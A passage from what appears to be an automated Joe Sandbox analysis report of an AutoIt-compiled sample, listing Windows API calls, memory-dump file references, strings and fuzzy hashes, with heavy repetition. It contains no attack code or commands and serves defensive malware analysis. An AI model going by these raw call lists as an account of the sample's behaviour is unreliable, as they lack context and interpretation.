                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                        • String ID: 0SH$Wu
                                                                                        • API String ID: 3363477735-1135818761
                                                                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: IsThemeActive$uxtheme.dll
                                                                                        • API String ID: 2574300362-3542929980
                                                                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeInfoLibraryParametersSystem
                                                                                        • String ID: Wu
                                                                                        • API String ID: 3403648963-4083010176
                                                                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Peek$DispatchSleepTranslate
                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                        • API String ID: 1762048999-758534266
                                                                                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • __wcsicoll.LIBCMT ref: 00402007
                                                                                        • __wcsicoll.LIBCMT ref: 0040201D
                                                                                        • __wcsicoll.LIBCMT ref: 00402033
                                                                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                        • __wcsicoll.LIBCMT ref: 00402049
                                                                                        • _wcscpy.LIBCMT ref: 0040207C
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                        • API String ID: 3948761352-1609664196
                                                                                        • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                        • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                        • _wcsncat.LIBCMT ref: 0040E433
                                                                                        • __wmakepath.LIBCMT ref: 0040E44F
                                                                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                        • _wcscpy.LIBCMT ref: 0040E487
                                                                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                        • _wcscat.LIBCMT ref: 00427541
                                                                                        • _wcslen.LIBCMT ref: 00427551
                                                                                        • _wcslen.LIBCMT ref: 00427562
                                                                                        • _wcscat.LIBCMT ref: 0042757C
                                                                                        • _wcsncpy.LIBCMT ref: 004275BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                        • String ID: Include$\
                                                                                        • API String ID: 3173733714-3429789819
                                                                                        • Opcode ID: 7e361b3e195ecd6f30d71efcae858d2a0a6e930e28d9c4f54052f3c76b1711e3
                                                                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                        • Opcode Fuzzy Hash: 7e361b3e195ecd6f30d71efcae858d2a0a6e930e28d9c4f54052f3c76b1711e3
                                                                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _fseek.LIBCMT ref: 0045292B
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                        • __fread_nolock.LIBCMT ref: 00452961
                                                                                        • __fread_nolock.LIBCMT ref: 00452971
                                                                                        • __fread_nolock.LIBCMT ref: 0045298A
                                                                                        • __fread_nolock.LIBCMT ref: 004529A5
                                                                                        • _fseek.LIBCMT ref: 004529BF
                                                                                        • _malloc.LIBCMT ref: 004529CA
                                                                                        • _malloc.LIBCMT ref: 004529D6
                                                                                        • __fread_nolock.LIBCMT ref: 004529E7
                                                                                        • _free.LIBCMT ref: 00452A17
                                                                                        • _free.LIBCMT ref: 00452A20
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1255752989-0
                                                                                        • Opcode ID: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                        • Opcode Fuzzy Hash: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                                                        • String ID: FILE
                                                                                        • API String ID: 3888824918-3121273764
                                                                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                        • ImageList_ReplaceIcon.COMCTL32(009D1B68,000000FF,00000000), ref: 00410552
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009D1B68,000000FF,00000000), ref: 00410552
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _malloc
                                                                                        • String ID: Default
                                                                                        • API String ID: 1579825452-753088835
                                                                                        • Opcode ID: 686d4f57f13271a1b79ede908c7440ec237636b914f706902fa85cba7b54b38d
                                                                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                        • Opcode Fuzzy Hash: 686d4f57f13271a1b79ede908c7440ec237636b914f706902fa85cba7b54b38d
                                                                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2050 40f696-40f69c 2048->2050 2051 40f660-40f674 call 4150d1 2049->2051 2052 40f63e 2049->2052 2055 40f679-40f67c 2051->2055 2054 40f640 2052->2054 2056 40f642-40f650 2054->2056 2055->2045 2057 40f652-40f655 2056->2057 2058 40f67e-40f68c 2056->2058 2059 40f65b-40f65e 2057->2059 2060 425d1e-425d3e call 4150d1 call 414d04 2057->2060 2061 40f68e-40f68f 2058->2061 2062 40f69f-40f6ad 2058->2062 2059->2051 2059->2054 2072 425d43-425d5f call 414d30 2060->2072 2061->2057 2064 40f6b4-40f6c2 2062->2064 2065 40f6af-40f6b2 2062->2065 2067 425d16 2064->2067 2068 40f6c8-40f6d6 2064->2068 2065->2057 2067->2060 2070 425d05-425d0b 2068->2070 2071 40f6dc-40f6df 2068->2071 2070->2056 2073 425d11 2070->2073 2071->2057 2072->2050 2073->2067
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                        • String ID: AU3!$EA06
                                                                                        • API String ID: 1268643489-2658333250
                                                                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
